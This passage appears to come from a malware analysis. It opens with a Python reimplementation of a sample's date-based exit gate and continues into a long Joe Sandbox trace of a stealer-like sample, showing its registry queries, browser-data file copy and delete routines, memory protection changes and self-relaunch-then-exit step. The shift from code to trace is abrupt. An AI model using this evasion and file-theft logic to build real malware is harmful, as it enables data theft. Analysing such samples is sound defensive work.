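    m = re.match(r"\s*(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        return None
    day, month, year = (int(x) for x in m.groups())
    return year, month, day


def compare_filetime(a: int, b: int) -> int:
    """Same contract as CompareFileTime: -1 if a < b, 0 if equal, 1 if a > b."""
    return (a > b) - (a < b)


def would_exit(now_utc: datetime, deadline_text: str) -> bool:
    """True when the clock is past the parsed date, the branch assumed to reach ExitProcess."""
    parsed = parse_date_like_sscanf(deadline_text)
    if parsed is None:
        return False   # assumption: an unparsable date skips the gate rather than exiting
    now_ft = systemtime_to_filetime(now_utc.year, now_utc.month, now_utc.day,
                                    now_utc.hour, now_utc.minute, now_utc.second,
                                    now_utc.microsecond // 1000)
    deadline_ft = systemtime_to_filetime(*parsed)
    return compare_filetime(now_ft, deadline_ft) > 0
```

The tick arithmetic is the part worth keeping: a FILETIME of 116444736000000000 is 1970-01-01, which is a quick sanity check when a 64-bit value is compared inline instead of through CompareFileTime, as the absence of that call in the trace suggests.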
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417E37
                                      • HeapAlloc.KERNEL32(00000000), ref: 00417E3E
                                      • RegOpenKeyExA.ADVAPI32(80000002,0087D760,00000000,00020119,?), ref: 00417E5E
                                      • RegQueryValueExA.ADVAPI32(?,00880F40,00000000,00000000,000000FF,000000FF), ref: 00417E7F
                                      • RegCloseKey.ADVAPI32(?), ref: 00417E92
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 3466090806-0
                                      • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                      • Instruction ID: f35b37edc560d93cca1bbeb044924e1a71a0ba88b9c12cde0d27c4035fcf8d53
                                      • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                      • Instruction Fuzzy Hash: 01114CB5A84205FFD710CFD4DD4AFBBBBB9EB09B10F10425AF605A7280D77858018BA6
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0231809E
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 023180A5
                                      • RegOpenKeyExA.ADVAPI32(80000002,0064A1D4,00000000,00020119,?), ref: 023180C5
                                      • RegQueryValueExA.ADVAPI32(?,0064A4EC,00000000,00000000,000000FF,000000FF), ref: 023180E6
                                      • RegCloseKey.ADVAPI32(?), ref: 023180F9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 3225020163-0
                                      • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                      • Instruction ID: c4a054ecec97f15f61296aa59ceea80e6af1a1a21dcaf4f0688523bc2ab24566
                                      • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                      • Instruction Fuzzy Hash: 90116DB6A84209BBE704CFD4DC4AFABB7BDEB05700F004219F615A7280C77558008BA1
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0231799B
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 023179A2
                                      • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,02317920), ref: 023179C2
                                      • RegQueryValueExA.ADVAPI32(02317920,00420AAC,00000000,00000000,?,000000FF), ref: 023179E1
                                      • RegCloseKey.ADVAPI32(02317920), ref: 023179EB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 3225020163-0
                                      • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                      • Instruction ID: d571568d269fc5199a069b53386e85dca67095528a54bcc5d989f2ab420d083b
                                      • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                      • Instruction Fuzzy Hash: 2B01FFB9A80308BFEB10DFE4DC4AFAEB7B9EB48701F105559FA05A7280DB7596008F51
                                      APIs
                                      • StrStrA.SHLWAPI(00880860,?,?,?,0041140C,?,00880860,00000000), ref: 0041926C
                                      • lstrcpyn.KERNEL32(0064AB88,00880860,00880860,?,0041140C,?,00880860), ref: 00419290
                                      • lstrlenA.KERNEL32(?,?,0041140C,?,00880860), ref: 004192A7
                                      • wsprintfA.USER32 ref: 004192C7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpynlstrlenwsprintf
                                      • String ID: %s%s
                                      • API String ID: 1206339513-3252725368
                                      • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                      • Instruction ID: a59194731e19cd62a1114d9db51b1d7a77f87ed08144ed5303bdb74f02b8d175
                                      • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                      • Instruction Fuzzy Hash: FD010879580108FFCB04DFECC998EAE7BBAEB49394F108548F9098B300C635AA40DB95
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                      • HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                      • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                      • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                      • RegCloseKey.ADVAPI32(?), ref: 004012FF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 3466090806-0
                                      • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                      • Instruction ID: a780f69aac564b2d92452564e57f3177c1920ebdf93c56c18a8360c70aaf8c3d
                                      • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                      • Instruction Fuzzy Hash: 000131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA05A7280D6749A018F51
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0230151B
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02301522
                                      • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 0230153E
                                      • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 0230155C
                                      • RegCloseKey.ADVAPI32(?), ref: 02301566
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 3225020163-0
                                      • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                      • Instruction ID: 376aa551060f53f9c823618b62f85fb50fac055c5200202cadda3f0d40003efe
                                      • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                      • Instruction Fuzzy Hash: E90131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA0597280D6749A018F91
                                      APIs
                                      • __getptd.LIBCMT ref: 0041C74E
                                        • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                        • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                      • __getptd.LIBCMT ref: 0041C765
                                      • __amsg_exit.LIBCMT ref: 0041C773
                                      • __lock.LIBCMT ref: 0041C783
                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 0041C797
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                      • String ID:
                                      • API String ID: 938513278-0
                                      • Opcode ID: efdb286082815a34fe65cdf39a39efb78846e04f1ab798c9691acb082f02800f
                                      • Instruction ID: 747b7d94d78dcab7bc4ad9ba185e37b4c367e78d81b7dca89f1d9f587bf674ed
                                      • Opcode Fuzzy Hash: efdb286082815a34fe65cdf39a39efb78846e04f1ab798c9691acb082f02800f
                                      • Instruction Fuzzy Hash: EBF09632A817119BD7207BB95C467DE33A09F00728F24414FF414A62D2CBAC59D29E9E
                                      APIs
                                      • __getptd.LIBCMT ref: 0231C9B5
                                        • Part of subcall function 0231C206: __getptd_noexit.LIBCMT ref: 0231C209
                                        • Part of subcall function 0231C206: __amsg_exit.LIBCMT ref: 0231C216
                                      • __getptd.LIBCMT ref: 0231C9CC
                                      • __amsg_exit.LIBCMT ref: 0231C9DA
                                      • __lock.LIBCMT ref: 0231C9EA
                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 0231C9FE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                      • String ID:
                                      • API String ID: 938513278-0
                                      • Opcode ID: 82266bfdd90354e846418a99e827ba5feeba1708c4c917e9cb387fe0226bacf2
                                      • Instruction ID: bfc7ca3f3c7516f13e10f4e60c0f93df12c78afdcd7e6afca0c48928d97a728d
                                      • Opcode Fuzzy Hash: 82266bfdd90354e846418a99e827ba5feeba1708c4c917e9cb387fe0226bacf2
                                      • Instruction Fuzzy Hash: BFF0B432AD07109BDB3DBBA89802B5D73B2AF00728F10154BD414AB1D0DB245552DF9F
                                      APIs
                                      • StrCmpCA.SHLWAPI(00000000,00878410), ref: 0041079A
                                      • StrCmpCA.SHLWAPI(00000000,00878320), ref: 00410866
                                      • StrCmpCA.SHLWAPI(00000000,00878400), ref: 0041099D
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy
                                      • String ID: `_A
                                      • API String ID: 3722407311-2339250863
                                      • Opcode ID: ad8dc5e93b182d36aa8816b13cb8526b02303e3c68790e1ea0db99ee73ed39a9
                                      • Instruction ID: 94d948ae3f98129d28702617e668470e7ead908e0178ded6cd69974dbc9b1d9a
                                      • Opcode Fuzzy Hash: ad8dc5e93b182d36aa8816b13cb8526b02303e3c68790e1ea0db99ee73ed39a9
                                      • Instruction Fuzzy Hash: 3991C975A101089FCB28EF65D991BED77B5FF94304F40852EE8099F281DB349B46CB86
                                      APIs
                                      • StrCmpCA.SHLWAPI(00000000,00878410), ref: 0041079A
                                      • StrCmpCA.SHLWAPI(00000000,00878320), ref: 00410866
                                      • StrCmpCA.SHLWAPI(00000000,00878400), ref: 0041099D
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy
                                      • String ID: `_A
                                      • API String ID: 3722407311-2339250863
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416663
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00416726
                                      • ExitProcess.KERNEL32 ref: 00416755
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                      • String ID: <
                                      • API String ID: 1148417306-4251816714
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 023168CA
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                        • Part of subcall function 0231AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0231AC2C
                                        • Part of subcall function 0231AC17: lstrcpy.KERNEL32(00000000), ref: 0231AC6B
                                        • Part of subcall function 0231AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0231AC79
                                        • Part of subcall function 0231AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0231AB6C
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 0231698D
                                      • ExitProcess.KERNEL32 ref: 023169BC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                      • String ID: <
                                      • API String ID: 1148417306-4251816714
                                      APIs
                                      • VirtualProtect.KERNEL32(?,?,@Jn@,@Jn@), ref: 00406C9F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID: @Jn@$Jn@$Jn@
                                      • API String ID: 544645111-1180188686
                                      APIs
                                      • lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                      • lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcatlstrcpy
                                      • String ID: vI@$vI@
                                      • API String ID: 3905823039-1245421781
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                      • HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                      • wsprintfW.USER32 ref: 00418D78
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocProcesswsprintf
                                      • String ID: %hs
                                      • API String ID: 659108358-2783943728
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,0087C4D8,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A2E1
                                      • lstrlenA.KERNEL32(00000000,00000000), ref: 0040A3FF
                                      • lstrlenA.KERNEL32(00000000), ref: 0040A6BC
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                      • DeleteFileA.KERNEL32(00000000), ref: 0040A743
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                      • String ID:
                                      • API String ID: 257331557-0
                                      APIs
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                        • Part of subcall function 0231AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0231AC2C
                                        • Part of subcall function 0231AC17: lstrcpy.KERNEL32(00000000), ref: 0231AC6B
                                        • Part of subcall function 0231AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0231AC79
                                        • Part of subcall function 0231AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0231AB6C
                                        • Part of subcall function 02318DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,02301660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 02318DED
                                        • Part of subcall function 0231AB87: lstrcpy.KERNEL32(00000000,?), ref: 0231ABD9
                                        • Part of subcall function 0231AB87: lstrcat.KERNEL32(00000000), ref: 0231ABE9
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0230A548
                                      • lstrlen.KERNEL32(00000000,00000000), ref: 0230A666
                                      • lstrlen.KERNEL32(00000000), ref: 0230A923
                                        • Part of subcall function 0231AA07: lstrcpy.KERNEL32(?,00000000), ref: 0231AA4D
                                        • Part of subcall function 0230A077: memcmp.MSVCRT(?,00421264,00000003), ref: 0230A094
                                      • DeleteFileA.KERNEL32(00000000), ref: 0230A9AA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                      • String ID:
                                      • API String ID: 257331557-0
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,0087C4D8,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D481
                                      • lstrlenA.KERNEL32(00000000), ref: 0040D698
                                      • lstrlenA.KERNEL32(00000000), ref: 0040D6AC
                                      • DeleteFileA.KERNEL32(00000000), ref: 0040D72B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID:
                                      • API String ID: 211194620-0
                                      APIs
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                        • Part of subcall function 0231AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0231AC2C
                                        • Part of subcall function 0231AC17: lstrcpy.KERNEL32(00000000), ref: 0231AC6B
                                        • Part of subcall function 0231AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0231AC79
                                        • Part of subcall function 0231AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0231AB6C
                                        • Part of subcall function 02318DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,02301660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 02318DED
                                        • Part of subcall function 0231AB87: lstrcpy.KERNEL32(00000000,?), ref: 0231ABD9
